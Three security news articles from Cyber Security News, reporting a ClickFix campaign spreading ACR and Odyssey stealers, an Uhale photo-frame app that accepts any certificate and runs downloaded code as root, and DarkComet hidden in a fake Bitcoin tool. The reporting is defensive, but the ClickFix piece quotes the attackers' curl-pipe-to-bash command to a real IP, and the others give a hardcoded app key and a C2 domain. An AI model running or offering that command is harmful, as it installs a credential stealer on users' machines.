A growing social engineering technique called ClickFix has emerged as one of the most successful methods for distributing malware in recent months.

This attack tricks users into copying and running commands directly into their operating systems command line interface, ultimately installing dangerous information-stealing software.

The technique has proven remarkably effective because it bypasses traditional email security solutions and operates within browser sandboxes where most security tools cannot detect the malicious activity.

The attack typically begins when users search for cracked software through search engines. Cybercriminals create fake landing pages hosted on trusted platforms like Google Colab, Drive, Sites, and Groups to avoid being blocked by security systems.

These pages act as initial contact points that redirect victims based on their operating system. Windows users receive the ACR stealer, while macOS users are redirected to pages that deploy the Odyssey infostealer.

Intel471 security researchers identified this campaign in June 2025 during proactive malware hunting operations.

The investigation revealed that threat actors were successfully targeting both major operating systems through a single infrastructure.

What makes this attack particularly concerning is its fileless execution. When victims paste the commands, malicious payloads are pulled directly into memory, making them invisible to traditional security software.

Infection Mechanism and Technical Execution

For Windows users, the attack chain guides victims through several redirection points before reaching a MEGA file hosting page containing a password-protected ZIP archive.

Inside this archive sits the ACR stealer disguised as setup.exe. The malware not only steals credentials and personal data but also serves as a loader, installing additional threats such as SharkClipper, a cryptocurrency clipboard hijacker.

MacOS users encounter a different approach that involves a fake Cloudflare security check page. When users attempt to copy what appears to be a verification string, they actually copy a Base64-encoded shell command.

Once decoded, this command executes:-

curl - s http://45.135.232.33/droberto39774 | nohup bash

This command silently downloads and runs the Odyssey stealer, which harvests passwords, cookies, cryptocurrency wallets, Apple Notes, Keychain entries, and system data, then compresses everything into out.zip for exfiltration.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware appeared first on Cyber Security News.

Digital photo frames have become a standard household device for displaying family memories, and most users assume these simple gadgets prioritize simplicity over complexity.

However, a troubling discovery reveals that specific Android photo frames running the Uhale app automatically download and execute malware as soon as they boot.

Quokka security analysts noted or identified this critical issue after examining popular digital picture frame models sold on major retail platforms.

These frames, often marketed under brands like BIGASUO, WONNIE, and MaxAngel, share a common vulnerability that puts millions of users at risk.

The affected devices are vulnerable to automatic malware installation without user interaction.

Security analysts at Quokka detected that the security concern extends far beyond simple data theft. These vulnerabilities create complete pathways for attackers to gain full control of the device with minimal effort.

The malware discovered during the analysis is associated with the Vo1d botnet and the Mzmess malware family, which have already infected an estimated 1.6 million Android TV devices worldwide.

When connected to a home or office network, a compromised frame can serve as an entry point for lateral attacks on other devices, potentially leading to widespread network compromise and data exposure.

The root of the problem lies in how the Uhale application handles security at the software level. Rather than implementing modern security standards, the developers relied on outdated Android 6.0 with disabled security features and hardcoded encryption keys embedded directly in the app code.

This combination creates multiple vulnerability pathways that skilled attackers can exploit through simple network interception techniques.

The implications are severe because these frames typically remain continuously connected to networks, providing attackers with persistent access opportunities.

Remote Code Execution Through Insecure Trust Management

The primary exploitation vector involves a weakness in how the Uhale app validates security certificates during network communications.

When a frame boots up and checks for app updates, it communicates with servers at dcsdkos.dc16888888.com over HTTPS.

However, the app implements a custom security validator that accepts any certificate without proper verification.

This oversight allows attackers positioned on the same network to intercept these connections and inject malicious code.

The insecure trust manager is implemented in the com.nasa.memory.tool.lf class. Instead of validating that communication partners are legitimate, the checkServerTrusted method simply returns empty values without verifying them.

When combined with a hardcoded encryption key DE252F9AC7624D723212E7E70972134D stored in the app, attackers can craft responses that the device will accept and decrypt.

The response contains a download link to a Dalvik Executable file, which the app then loads and executes using Java reflection techniques.

The execution occurs via the DexClassLoader, which dynamically loads code from external sources.

The app creates an instance of this class loader pointing to downloaded JAR files stored in the datadatacom.zeasn.framefiles.honor directory.

It then searches for a predefined entry-point method called com.sun.galaxy.lib.OceanInit.init is invoked automatically.

Since the Uhale app operates with system-level privileges and the devices have SELinux disabled and su commands available, the injected code immediately runs with unrestricted root access.

This allows attackers to execute arbitrary shell commands, install persistent malware, modify system files, or harvest sensitive data from other applications.

The malware samples identified included multiple APK packages classified by Quokka’s behavioral analysis engine as spyware with 100 percent confidence.

These included com.app.mz.s101, com.app.mz.popan, and several others specifically designed for surveillance and system control purposes.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Android Photo Frames App Downloads Malware, Giving Hackers Control of The Device Without User Interaction appeared first on Cyber Security News.

The rise of cryptocurrency has created new opportunities for cybercriminals to exploit unsuspecting users.

Attackers are now disguising the notorious DarkComet remote access trojan as Bitcoin-related applications, targeting cryptocurrency enthusiasts who download tools from unverified sources.

This malware campaign demonstrates how old threats continue to resurface with modern social engineering techniques.

DarkComet RAT is a well-known remote access trojan that allows attackers to gain complete control over infected systems.

Despite being discontinued by its creator years ago, the malware continues to circulate in underground forums and remains highly effective.

It provides attackers with extensive capabilities including keystroke logging, file theft, webcam surveillance, and remote desktop control.

These features make it particularly dangerous for cryptocurrency users, as stolen credentials can lead directly to financial losses.

The malicious file analyzed in this campaign was distributed as a compressed RAR archive containing an executable disguised as “94k BTC wallet.exe.”

This delivery method helps attackers bypass email filters and reduces detection rates. The executable was packed with UPX (Ultimate Packer for Executables) to further evade antivirus software and hide its true nature from security analysis.

Point Wild security analysts identified the malware after investigating suspicious Bitcoin-related applications. The research team discovered that once extracted and executed, the fake Bitcoin tool immediately activates DarkComet’s full capabilities.

Instead of providing any legitimate cryptocurrency functionality, the malware begins establishing persistence on the infected system and attempts to communicate with its command-and-control server.

Technical Breakdown and Infection Mechanism

The malware establishes persistence by copying itself to %AppData%\Roaming\MSDCSC\explorer.exe and creating a registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.

This ensures the malware executes automatically every time the system restarts. This shows the file information of the compressed RAR archive, while the one below shows the UPX packing structure visible in CFF Explorer.

Analysis revealed the sample’s embedded configuration containing critical operational details.

The malware uses a mutex named DC_MUTEX-ARULYYD to prevent multiple instances from running simultaneously.

Network analysis showed attempted connections to the command-and-control server at kvejo991.ddns.net over TCP port 1604.

Although the C2 server was offline during testing, the repeated connection attempts confirmed active beaconing behavior consistent with DarkComet operations.

The unpacked executable revealed multiple standard PE sections, including .text, .data, and .idata.

The malware injects its payload into legitimate Windows processes like notepad.exe to perform keylogging and screen capture while remaining hidden.

Captured keystrokes are stored in log files with names like “2025-10-29-4.dc” before being exfiltrated through the C2 channel.

File hashes for detection include SHA256: 11bf1088d66bc3a63d16cc9334a05f214a25a47f39713400279e0823c97eb377 for the compressed archive and SHA256: 5b5c276ea74e1086e4835221da50865f872fe20cfc5ea9aa6a909a0b0b9a0554 for the packed executable.

Users should avoid downloading cryptocurrency tools from untrusted sources and maintain updated security software to detect such threats effectively.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Beware of Fake Bitcoin Tool That Hides DarkComet RAT Malware With it appeared first on Cyber Security News.